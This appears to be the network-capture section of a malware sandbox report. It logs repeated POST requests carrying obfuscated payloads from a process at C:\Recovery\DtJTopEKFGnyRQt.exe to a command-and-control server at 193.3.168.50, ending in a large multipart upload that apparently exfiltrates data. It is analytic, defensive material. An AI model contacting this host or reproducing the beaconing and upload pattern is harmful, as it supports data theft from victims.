05 61 66 60 09 68 42 66 59 77 6f 70 04 7f 4d 6f 5a 6f 6c 64 5a 7a 73 76 00 7c 6d 60 08 77 01 7c 05 7e 62 76 09 69 53 5d 4f 7b 7d 5b 5e 7f 62 61 02 7b 5d 46 51 68 7c 7c 40 7d 70 64 0c 6a 49 6e 05 7b 43 51 01 6c 5b 64 46 6b 62 7c 59 7d 64 70 54 68 60 75 42 7b 63 70 4d 69 04 78 03 77 05 65 51 7b 5c 79 06 76 66 64 00 7d 66 68 04 7d 48 75 41 74 62 77 02 7f 5c 53 01 7f 77 62 0d 7b 48 52 0a 7d 73 59 00 76 4c 6d 4e 77 [TRUNCATED] Data Ascii: 56cVJ~on`Xo\pa{iwlR~`jSnpcXi[dI`MTUz_~ZuH\|\|qxUKrPtLgk\j^\|I_QxfpA}uiLcXvZhbjl^Nd`Ywv{\|[i}^r[xw{Y{gpl~\|\ya]l`q_hs[{g`j\Q@uxzQA[\|gkUhazTbUo^{UxHtNuTnqnY~\|q]oafwsR^ual`zP~]y_`[}af`hBfYwopMoZoldZzsv\|m`w\|~bviS]O{}[^ba{]FQh\|\|@}pdjIn{CQl[dFkb\|Y}dpTh`uB{cpMixweQ{\yvfd}fh}HuAtbw\Swb{HR}sYvLmNwO_HOjH}Bp@w{wawxri\|p[{gZxgxxSwybd{]fNZIxYd}rua^H~RcI\|A}au@w\|ZLx\|Rv`zyae\|\|rO{qjwsUJuOtNt_r\|pz@wbqv[x\|BeBv\|xshI{Rg{^TIC`vg\|O}LT\|m]{}fL}raNh@l^~pp}YTNxCgxLxH~a{~w]@Nezc\|}r`Ft]uO{aivHZH}Xt~HyOvr\|baMYrxXhO~Mcu\Svq}GO~I\|twuagJxb_I}^iywhyg`{}sxr\|zs\{]NZydx}b^_va{]io\|Z\|gtO\|a}NaR^oRcXtsb@zbejl~_z\y\}b`g{ZL~JxYbMtaiBbu\|B~ouBw\|o^scZyosyZ~lN`Yl~\[SzSYQfn^jfzScTdpT\|cOaq@on`_l[wS}`gPdNSzSWsYSxXutzQmbib_`J}fVN~v[wLx[rykgWU{XlO\|`wGv\_cvqTLy_joNR{d]YbVV[nHWcnIRppY^@x}kDzb\|Ky]~O}wp@^Q_QtD\bQ@QTXSkc{_[PlUo\|~]GZYDPxv~^ioAW}e_Y`U[XcXXbLx^\^m[nqwUNRUC\u{s[k`DTp`\TcUQToWXdCaSij\|R [TRUNCATED]
Dec 4, 2024 15:45:50.875360012 CET	350	IN	Data Raw: 6c 53 5f 63 60 00 4c 51 4f 7c 42 70 5a 54 54 56 06 72 40 5c 65 55 42 51 5e 08 5d 52 01 6e 4d 5d 7e 78 06 63 04 09 5e 68 60 7a 0f 7f 5e 6f 6c 7a 5e 45 59 62 04 6e 40 5a 72 40 01 6b 07 5f 44 68 0a 7b 4f 54 64 07 03 5b 5b 5e 7f 6c 61 09 5c 7a 5e 57 Data Ascii: lS_c`LQO\|BpZTTVr@\eUBQ^]RnM]~xc^h`z^olz^EYbn@Zr@k_Dh{OTd[[^la\z^WZ`dDRto^\|nng]VN~E{Y]_Tw@WaRGZYZQSdTP[f}ZkZ\|R^Xm_rPxv~^ioAW}e_Y`UaC]r[Lkcm[~AbbpxSCZVkZxrGl`\|BlvZ~zsWcdAR~aVRn^W~qQnbhsdQ}Qp}w~g~N\|PEZ
Dec 4, 2024 15:45:50.921910048 CET	363	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 384 Expect: 100-continue
Dec 4, 2024 15:45:51.276156902 CET	384	OUT	Data Raw: 5a 5b 5f 5a 5c 5a 5f 53 5a 58 51 52 55 5f 5a 5b 50 56 5d 53 59 5f 57 40 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z[_Z\Z_SZXQRU_Z[PV]SY_W@^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.[;0>+!5"\,!9,W:07'< 20<A#34(=#G $],
Dec 4, 2024 15:45:51.312896013 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:45:51.692146063 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:45:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 26 02 33 5d 2f 0d 33 2f 27 1b 2b 1d 20 1c 2e 30 38 01 33 07 3d 45 25 14 06 0c 3d 2a 23 11 35 3d 39 02 28 39 34 0a 3c 27 30 1b 29 12 20 58 00 1a 25 05 34 0c 38 5c 39 29 30 10 24 3e 35 03 27 2d 29 14 28 39 3c 0e 3d 20 34 1f 26 58 36 57 2a 33 0b 16 2c 37 21 5f 3a 3e 22 1b 26 05 2a 52 0e 17 21 51 3e 00 05 00 37 22 36 0f 2a 08 2c 01 3f 06 2b 11 27 38 3e 54 23 3e 3d 1f 30 20 13 1e 30 21 2d 0c 24 2b 24 01 32 3f 20 59 2a 39 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&3]/3/'+ .083=E%=#5=9(94<'0) X%48\9)0$>5'-)(9<= 4&X6W3,7!_:>"&R!Q>7"6,?+'8>T#>=0 0!-$+$2? Y*9 _. W1WT0
Dec 4, 2024 15:45:53.092909098 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:45:53.450112104 CET	1012	OUT	Data Raw: 5a 5a 5f 5b 5c 5d 5f 53 5a 58 51 52 55 5e 5a 59 50 57 5d 5d 59 58 57 40 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ZZ_[\]_SZXQRU^ZYPW]]YXW@^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.^,#"=9 :/%#$U,##%/<W7:$>D"V8W)#G $],
Dec 4, 2024 15:45:53.484957933 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:45:53.933549881 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:45:53 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49753	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:45:53.468621969 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1452 Expect: 100-continue
Dec 4, 2024 15:45:53.839597940 CET	1452	OUT	Data Raw: 5a 5e 5a 5f 5c 5e 5a 53 5a 58 51 52 55 56 5a 5b 50 50 5d 5b 59 5d 57 44 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z^Z_\^ZSZXQRUVZ[PP][Y]WD^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.^,%?9#%681\498U9#83,T T*3" 3>=#G $],!
Dec 4, 2024 15:45:54.762753963 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:45:54.996897936 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:45:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 26 03 24 3b 24 11 30 12 2b 15 2b 55 3c 59 3a 33 0a 02 30 3e 2e 1d 25 5c 37 54 3d 04 30 03 20 3d 39 00 3f 5f 28 0a 3f 51 2f 08 3e 12 20 58 00 1a 26 5d 20 31 27 01 3a 39 02 11 32 5b 21 04 33 03 26 03 3e 07 0e 08 3d 0a 24 57 25 2e 36 14 2a 55 3a 0b 2f 27 21 5f 2e 58 3d 00 24 2f 2a 52 0e 17 21 53 2a 2e 28 11 34 0f 3a 0c 29 57 33 5d 29 2c 2c 0e 33 38 2e 52 23 07 35 52 33 30 17 10 30 0c 22 54 27 28 3f 5a 25 3f 33 05 29 03 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&$;$0++U<Y:30>.%\7T=0 =9?_(?Q/> X&] 1':92[!3&>=$W%.6U:/'!_.X=$/R!S*.(4:)W3]),,38.R#5R300"T'(?Z%?3) _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49756	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:45:54.234232903 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:45:54.587326050 CET	1012	OUT	Data Raw: 5f 5e 5f 5f 59 5e 5f 54 5a 58 51 52 55 56 5a 5a 50 5f 5d 52 59 5f 57 48 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _^__Y^_TZXQRUVZZP_]RY_WH^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.8_+0Y4/1[#97.#8$,#2:$,B6 W*=#G $],!
Dec 4, 2024 15:45:55.504671097 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:45:55.738531113 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:45:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49761	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:45:55.997726917 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:45:56.358603001 CET	1012	OUT	Data Raw: 5a 5e 5f 53 5c 5d 5a 54 5a 58 51 52 55 54 5a 5e 50 54 5d 5b 59 53 57 48 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z^_S\]ZTZXQRUTZ^PT][YSWH^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY-8=+(7:_/,- * -##3R#=%>$D508V*#G $],)
Dec 4, 2024 15:45:57.237714052 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:45:57.472987890 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:45:57 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49764	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:45:57.759591103 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1008 Expect: 100-continue
Dec 4, 2024 15:45:58.118813038 CET	1008	OUT	Data Raw: 5a 5a 5f 5e 5c 5c 5f 55 5a 58 51 52 55 57 5a 5d 50 5e 5d 5c 59 5c 57 42 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: ZZ_^\\_UZXQRUWZ]P^]\Y\WB^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY./9]((X45=,1Y!)<,3?Z', 50> B!8T=#G $],=
Dec 4, 2024 15:45:58.997445107 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:45:59.236766100 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:45:58 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49771	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:45:59.509130001 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:45:59.868268013 CET	1012	OUT	Data Raw: 5a 5d 5f 5a 59 5f 5a 5f 5a 58 51 52 55 54 5a 5a 50 52 5d 5a 59 52 57 47 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: Z]_ZY_Z_ZXQRUTZZPR]ZYRWG^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY--0?:$ %:[8?%\4*'-##X%/8T !=X'-060W(-#G $],)
Dec 4, 2024 15:46:00.747137070 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:00.982209921 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49776	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:00.495656967 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1888 Expect: 100-continue
Dec 4, 2024 15:46:00.852673054 CET	1888	OUT	Data Raw: 5f 5a 5f 5b 59 5c 5a 53 5a 58 51 52 55 55 5a 58 50 52 5d 53 59 53 57 44 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _Z_[Y\ZSZXQRUUZXPR]SYSWD^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY.^8:=9!&:[,> _8:3[$<U#2%=/!;)=#G $],-
Dec 4, 2024 15:46:01.755700111 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:01.988687038 CET	349	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:01 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 39 38 0d 0a 09 11 26 03 25 28 23 0f 33 2c 33 50 29 33 24 12 2d 55 2b 5f 27 2e 2d 08 25 03 27 11 29 3a 02 03 22 5b 26 59 29 29 27 55 3e 34 20 53 2a 28 20 58 00 1a 25 05 37 54 33 00 2e 29 06 5c 25 13 04 16 24 03 2e 04 29 3a 28 0b 2a 0d 24 10 25 07 36 19 3e 0a 39 16 38 1d 21 5f 2f 2e 32 15 24 2f 2a 52 0e 17 21 56 3e 07 34 5b 23 22 22 0f 3d 22 2c 04 3f 01 30 0f 30 38 2e 55 20 3e 39 56 30 30 31 52 33 1c 2d 0f 25 28 3b 12 24 3c 24 1e 2a 13 20 5f 2e 05 20 57 00 31 57 54 0d 0a 30 0d 0a 0d 0a Data Ascii: 98&%(#3,3P)3$-U+_'.-%'):"[&Y))'U>4 S( X%7T3.)\%$.):($%6>98!_/.2$/R!V>4[#""=",?008.U >9V001R3-%(;$<$ _. W1WT0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49779	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:01.284189939 CET	364	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 1012 Expect: 100-continue
Dec 4, 2024 15:46:01.634181023 CET	1012	OUT	Data Raw: 5f 51 5f 5e 5c 5d 5a 54 5a 58 51 52 55 5f 5a 5e 50 51 5d 52 59 52 57 45 5e 5f 58 54 51 5f 55 5c 59 58 55 5f 55 58 54 54 42 56 53 57 54 5e 5f 5c 56 56 5c 5a 5d 53 5f 5b 55 5c 56 5d 5d 58 54 57 5f 58 5f 59 54 58 55 54 43 52 42 50 5d 5b 5c 54 57 52 Data Ascii: _Q_^\]ZTZXQRU_Z^PQ]RYRWE^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\STR\^]RX[Z_R__[TT\]PZTPZB_UU\Z_^]ZY][TR_[V\]S_TBP^[X\PY._8 =<)#58Z% 979?0?? !)[0> !#'>#G $],
Dec 4, 2024 15:46:02.496546030 CET	25	IN	HTTP/1.1 100 Continue
Dec 4, 2024 15:46:02.731705904 CET	200	IN	HTTP/1.1 200 OK Server: nginx Date: Wed, 04 Dec 2024 14:46:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 34 0d 0a 3b 59 5c 57 0d 0a 30 0d 0a 0d 0a Data Ascii: 4;Y\W0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49785	193.3.168.50	80	8188	C:\Recovery\DtJTopEKFGnyRQt.exe

Timestamp	Bytes transferred	Direction	Data
Dec 4, 2024 15:46:03.089483976 CET	410	OUT	POST /privatetemp3line/Track14/Mariadb/flower/dleGeneratorBettersecure/SqlExternalDatalifedatalife/0pipe/7Js/AsyncServer/473datalife/linebigloadprivate.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ndVvQxCQKh641w1VNpwLb2irfBNeaHaU48 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0 Host: 193.3.168.50 Content-Length: 131294 Expect: 100-continue
Dec 4, 2024 15:46:03.446486950 CET	12360	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 6e 64 56 76 51 78 43 51 4b 68 36 34 31 77 31 56 4e 70 77 4c 62 32 69 72 66 42 4e 65 61 48 61 55 34 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 30 22 Data Ascii: ------ndVvQxCQKh641w1VNpwLb2irfBNeaHaU48Content-Disposition: form-data; name="0"Content-Type: text/plain_]Z_YV_RZXQRUWZ_P_][Y[WE^_XTQ_U\YXU_UXTTBVSWT^_\VV\Z]S_[U\V]]XTW_X_YTXUTCRBP][\TWR_QQEZZSST\XXP]]_[[T^^R[PZWTW\XUXQW_^]T^R_^\WCW\ST
Dec 4, 2024 15:46:03.568928957 CET	4944	OUT	Data Raw: 4f 59 76 49 4c 4a 31 4e 64 33 52 57 42 6c 70 2b 68 77 62 78 75 61 33 46 78 2b 42 46 4f 4e 32 59 43 72 56 65 64 72 6f 73 39 72 34 51 66 61 61 42 36 7a 44 2f 37 47 4e 56 65 2b 4c 4a 62 6c 4b 39 6c 79 39 53 63 7a 39 4d 6d 30 36 76 62 62 74 77 58 62 Data Ascii: OYvILJ1Nd3RWBlp+hwbxua3Fx+BFON2YCrVedros9r4QfaaB6zD/7GNVe+LJblK9ly9Scz9Mm06vbbtwXbxWufvW2ZFJd7yLaVcrlCDA1vib/xjl3taLX+YhynUaB2zDyjMyi225f3983M3gelU1/dE5fZn66pJt0JvRofHg+r1lSj3s7R/PNj8+s62NDC56hkjSEm9rY7mq4x7Q1QF8GEwd8n466P13aMvYUpM/5uiBwa9BZSL
Dec 4, 2024 15:46:03.568969965 CET	4944	OUT	Data Raw: 43 46 5a 63 4f 4a 69 30 2b 4e 53 51 2f 34 58 73 54 6c 74 46 39 4a 69 42 51 6d 64 4d 70 52 5a 36 6e 77 2f 56 4e 58 43 77 65 6e 69 49 68 42 79 2f 35 49 79 65 7a 4a 77 67 30 37 49 4a 59 39 50 6d 5a 4b 48 57 77 67 4f 6d 4e 57 37 7a 38 57 54 4f 45 68 Data Ascii: CFZcOJi0+NSQ/4XsTltF9JiBQmdMpRZ6nw/VNXCweniIhBy/5IyezJwg07IJY9PmZKHWwgOmNW7z8WTOEhzqhLf2qdpMXHbigggST4wiy3dih7Q03VzSf+MBpbWZO55fNOGyZQ3nRutO6swjreZqzpQFIwVdVB+Hfgv+KhlX5Yg33du+boy02xAxC3BmmRJvD/761D48dGPtcUFOXbFj/WFqREciSza6b9vZhb7j9++dTpaik5W
Dec 4, 2024 15:46:03.569015026 CET	2472	OUT	Data Raw: 43 6e 2b 30 43 2b 78 36 49 41 4e 61 43 5a 70 75 4d 76 71 71 37 6f 6c 64 74 48 78 43 66 59 49 45 44 44 4b 37 57 73 5a 33 57 58 37 4d 6c 4a 5a 32 56 5a 6f 76 65 78 43 64 32 4a 43 53 43 73 53 34 2b 35 66 75 48 4d 75 49 73 37 7a 41 43 70 39 4e 53 48 Data Ascii: Cn+0C+x6IANaCZpuMvqq7oldtHxCfYIEDDK7WsZ3WX7MlJZ2VZovexCd2JCSCsS4+5fuHMuIs7zACp9NSHoERN6j08RmyS3igZ8oFAHxU6ZwdYs3C6/gkFF31MdxA3cT42KCkPucLOdh0HqzlPyZ9k3udWkB6771xzPmInzVg8khXu2BPOf8srdxATPI2arL7PSe8cdEt1CPHqV3We9WhBz3YVXPfq0wO3ZBsJV8ENofdnaqLz1
Dec 4, 2024 15:46:03.569050074 CET	2472	OUT	Data Raw: 64 75 31 4e 72 65 53 58 61 4e 2b 66 33 2f 63 50 6a 30 64 75 63 74 33 37 79 73 33 72 64 63 35 35 6e 76 4d 38 7a 78 63 32 58 46 69 58 42 51 39 49 31 61 6b 51 66 53 71 36 4d 48 79 48 33 64 71 71 52 69 47 35 52 77 66 54 49 35 68 38 6f 5a 6e 72 69 71 Data Ascii: du1NreSXaN+f3/cPj0duct37ys3rdc55nvM8zxc2XFiXBQ9I1akQfSq6MHyH3dqqRiG5RwfTI5h8oZnriqRyYPDPtFdt4iafep/Hpro9xVl33rrlYtXM4ooYrdw9LZLec5IU3imnGSZDhTtI3Ahi/IMHOH50GChTpbripNJbFvbVmncJsr/u5K+KkoohK1PBZiVO7WzfeevEb58Bh1R9kOIWWXv5p4Gkc+6OzI0IUlFlbNbH8to
